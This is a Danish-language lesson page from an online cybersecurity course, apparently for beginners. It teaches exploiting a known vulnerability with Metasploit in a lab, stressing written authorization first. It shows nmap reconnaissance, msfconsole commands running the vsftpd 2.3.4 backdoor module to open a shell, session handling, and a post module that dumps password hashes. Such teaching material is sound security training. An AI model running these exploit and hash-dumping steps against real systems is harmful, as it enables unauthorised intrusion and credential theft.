Cyber Security Academy · Lektion

Udnyttelse af en kendt sårbarhed

Brug et exploitmodul mod et sårbart mål i et laboratoriemiljø, og fortolk sessionsoutputtet.

Lektion 2 af 413 trin

Udnyttelse af en kendt sårbarhed er en gratis Cyber Security Academy-lektion på CoddyKit. Dette er lektion 2 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Cyber Security Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Etik og autorisation først

Udnyttelse er kun lovlig mod systemer, du ejer, eller som du har udtrykkelig skriftlig tilladelse til at teste. Alle eksempler her er beregnet til autoriserede laboratoriemiljøer. Uautoriseret udnyttelse er en strafbar handling.

Anbefaling til laboratorieopsætning

Brug med vilje sårbare virtuelle maskiner: Metasploitable2/3, DVWA, VulnHub-maskiner eller HackTheBox/TryHackMe til lovlig øvelse. Test aldrig produktionssystemer eller rigtige systemer uden et underskrevet dokument, der fastlægger omfanget.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Rekognoscering før udnyttelse

Kortlæg altid systemet, før du forsøger at udnytte det. Kend den nøjagtige tjenesteversion, operativsystemet og konteksten, før du vælger et exploit. Forkert version = mislykket udnyttelse eller systemnedbrud.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Valg af det rigtige exploit

Søg efter tjenestenavn og version. Foretræk moduler med rangeringen Excellent eller Great. Læs info for at bekræfte, at målplatformen og versionsintervallet passer.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Konfiguration og kørsel af exploit

Angiv RHOSTS (fjernmål), LHOST (din IP-adresse til omvendte forbindelser) og LPORT (lytteporten), vælg en payload, og kør den derefter. Hold øje med oprettelse af sessioner eller fejlmeddelelser.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Fortolkning af resultater

Et vellykket exploit åbner en session. Mislykkede exploits viser fejlmeddelelser: forbindelsen blev afvist (porten er ikke åben), exploit mislykkedes (forkert version), ingen session blev oprettet (payloaden kunne ikke oprette forbindelse tilbage).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Interaktion med en session

Efter udnyttelsen kan du interagere med sessionen ved hjælp af sessions -i . Enkle kommandoskalsessioner giver en terminal, mens Meterpreter-sessioner giver en omfattende API.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Baggrund og flere sessioner

Tryk på Ctrl+Z for at sætte en session i baggrunden og vende tilbage til msfconsole. Det giver dig mulighed for at administrere flere sessioner eller køre moduler til efterfølgende udnyttelse mod en bestemt session.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Kontrolkommando

Mange exploit-moduler implementerer kommandoen check, som tester, om målet er sårbart, uden faktisk at udnytte det. Kør altid check først, hvis det er tilgængeligt.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Overvejelser om exploits' pålidelighed

Exploits kan få tjenester til at gå ned, udløse alarmer eller efterlade logfiler. Ved vurderinger af produktionssystemer skal du køre exploits i perioder med lav trafik, have en plan for tilbagerulning og bekræfte, at der findes sikkerhedskopier, før du kører noget destruktivt.

Dokumentation af udnyttelsen

Registrér tidsstempel, mål-IP-adresse og port, det anvendte exploit-modul, CVE-nummer, den anvendte payload, den opnåede session og dokumentation (skærmbillede eller terminaloutput). Det er dit bevis på sårbarheden i rapporten.

Hurtigt tjek

Hvad gør Metasploits "check"-kommando?

Opsummering: Udnyttelse af sårbarheder

Etisk udnyttelse følger et klart forløb: Indhent skriftlig tilladelse, kortlæg systemet omhyggeligt, vælg det passende exploit, læs moduloplysningerne, kør check først, hvis det er tilgængeligt, udfør det, og dokumentér alt. Udnyt aldrig systemer uden tilladelse — den tekniske kunnen og den etiske grænse kan ikke adskilles.

Gratis at komme i gang

Lær Cyber Security Academy med en AI-underviser — gratis

Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.

Kurser
76
Lektioner
303

Ofte stillede spørgsmål

Er lektionen “Udnyttelse af en kendt sårbarhed” gratis?

Ja — alle 3 lektioner i læringssporet Cyber Security Academy, inklusive “Udnyttelse af en kendt sårbarhed”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Hvad lærer jeg i “Udnyttelse af en kendt sårbarhed”?

Brug et exploitmodul mod et sårbart mål i et laboratoriemiljø, og fortolk sessionsoutputtet. Du øver dig i Cyber Security Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.

Skal jeg have erfaring for at begynde på Cyber Security Academy?

Der kræves ingen tidligere erfaring. Cyber Security Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 2 af 4.

Hvor lang tid tager lektionen “Udnyttelse af en kendt sårbarhed”?

De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.

Kan jeg skrive og køre kode i denne Cyber Security Academy-lektion?

Ja. Alle Cyber Security Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.

Alle lektioner i dette kursus

  1. Metasploit-arkitektur og msfconsole
  2. Udnyttelse af en kendt sårbarhed
  3. Payloads: Staged kontra stageless, Meterpreter
  4. Efter exploitering: Pivotering og persistens
← Tilbage til Cyber Security Academy